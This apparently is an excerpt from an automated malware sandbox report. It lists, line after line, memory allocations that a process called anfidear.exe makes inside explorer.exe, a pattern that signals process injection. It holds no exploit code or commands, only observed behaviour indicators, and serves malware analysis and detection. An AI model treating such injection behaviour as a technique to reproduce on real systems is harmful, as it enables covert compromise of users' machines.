Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AB00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AB10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AB20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AB30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AB40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AC50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AC60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AC70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AC80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AC90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ACA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ACB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ACC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ACD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ACE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ACF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AD00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AD10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AD20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AD30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AD40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AFA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AFB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AFC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AFD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AFE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AFF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B000000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B010000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B2F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B300000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B3E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B970000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B980000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B990000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B3B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B3C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B3D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B9A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B9B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B9C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B9D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B390000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B3A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B940000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B950000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B960000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 81A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 81B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B9E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B9F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: BA00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: BA10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: BA20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: BA30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DEF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DF90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DFA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DFB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DFC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DFD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DFE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DFF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E000000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E010000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E020000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E030000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E040000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E050000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E060000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E070000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E080000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E090000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E0A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E0B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E0C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E0D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E0E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E0F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E100000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E110000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E120000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E130000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E140000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E150000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E160000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E170000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E180000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E190000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E1A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E1B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E1C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E1D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E1E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E1F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E200000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E210000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E220000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E230000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E240000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E250000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E260000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E270000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E280000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E290000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E2A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8400000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E2B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E2C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E2D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E2E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E2F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E300000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E310000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E320000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E330000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E340000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E450000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E460000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E470000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E480000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E490000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E4A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E4B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E4D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E4E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E4F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E500000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E510000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E530000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E540000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E550000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E560000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E570000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E580000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E590000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E5A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E5B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E5C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E5D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E5E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E5F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E600000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E610000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E620000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E630000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E640000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FDD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FDE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FDF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FE90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FEA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FEB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FEC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FED0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FEE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FEF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FF90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FFA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FFB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FFC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FFD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FFE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: FFF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10000000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10010000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10020000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10030000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10040000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10050000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10060000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10070000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10080000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10090000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 100A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 100B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 100C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 100D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 100E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 100F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10100000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10110000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10120000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10130000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10140000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10150000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10160000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10170000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10180000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10190000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 101A0000 protect: page read and writeJump to behavior
